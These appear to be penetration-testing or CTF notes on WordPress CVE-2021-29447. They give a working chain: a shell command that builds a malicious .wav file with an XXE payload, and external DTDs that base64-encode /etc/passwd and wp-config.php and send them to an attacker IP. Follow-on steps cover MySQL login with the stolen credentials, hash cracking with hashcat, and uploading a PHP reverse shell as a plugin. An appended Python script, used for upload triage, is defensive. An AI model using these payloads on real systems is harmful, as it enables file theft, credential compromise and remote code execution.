# WordPress CVE-2021-29447

WordPress running on PHP 8, upload .wav file\
Patched in WP 5.7.1

#### php://filter/zlib.inflate/resource=test.deflated

• .wav file

```bash
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.17.14.169:8000/evil.dtd'"'"'>%remote;]>\x00' > payload.wav
```

• evil.dtd

```xml
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://10.17.14.169:8000/?a=%file;'>">
%eval;
%exfiltrate;
```

OR

```xml
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=../wp-config.php">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://10.17.14.169:8000/?a=%file;'>">
%eval;
%exfiltrate;
```

• decode zlib

```php
<?php echo zlib_decode(base64_decode('...')); ?>
```

thedarktangent:[redacted]

```bash
mysql -h 10.10.96.36 -P 3306 -u thedarktangent -p[redacted]

hashcat.bin -m 400 -a0 user.hash rockyou.txt
```

- wp users\
corp-001:[redacted]\
test-corp:[redacted]

• creating vulnerable WordPress plugin in zip format

1. 2 files required - php-reverse-shell and plugin info [both php files]
2. zip and upload them [`zip wp file1 file2`]
3. Access php-reverse-shell on URL - `<IP>/wp-content/plugins/wp/php-reverse-shell.php`
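
For triaging media uploads against this bug, the following added example (not part of the original notes) walks the RIFF chunks of a .wav file and flags any iXML chunk that contains a DOCTYPE or ENTITY declaration, which is the shape of payload.wav above. The function names, the sample files and the `example.invalid` host are constructed for illustration.

```python
import re
import struct

# DTD constructs have no place in audio metadata; either one marks the upload as suspect.
DTD_MARKERS = re.compile(rb"<!\s*(DOCTYPE|ENTITY)", re.IGNORECASE)

def riff_chunks(data: bytes):
    """Yield (chunk_id, payload) for each chunk in a RIFF/WAVE file."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    pos = 12
    while pos + 8 <= len(data):
        chunk_id = data[pos:pos + 4]
        (size,) = struct.unpack_from("<I", data, pos + 4)
        # Slicing clamps to the bytes present, so wrong declared sizes are tolerated.
        yield chunk_id, data[pos + 8:pos + 8 + size]
        pos += 8 + size + (size & 1)  # chunks are padded to an even length

def suspicious_ixml(data: bytes) -> bool:
    """True if any iXML chunk carries a DOCTYPE or ENTITY declaration."""
    return any(
        cid == b"iXML" and DTD_MARKERS.search(payload)
        for cid, payload in riff_chunks(data)
    )

def make_wav(ixml: bytes) -> bytes:
    """Constructed test input: a WAVE container holding only an iXML chunk."""
    chunk = b"iXML" + struct.pack("<I", len(ixml)) + ixml + b"\x00" * (len(ixml) & 1)
    return b"RIFF" + struct.pack("<I", 4 + len(chunk)) + b"WAVE" + chunk

# Constructed samples: plain iXML metadata, and one declaring an external DTD.
BENIGN = make_wav(b'<?xml version="1.0"?><BWFXML><PROJECT>demo</PROJECT></BWFXML>')
FLAGGED = make_wav(b'<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '
                   b"'http://dtd.example.invalid/x.dtd'>%remote;]>")

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("flagged", FLAGGED)):
        print(name, suspicious_ixml(blob))
```

A byte-level match like this misses DTDs delivered in other encodings such as UTF-16, so it is upload triage only; the fix noted at the top of these notes is the upgrade to 5.7.1.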
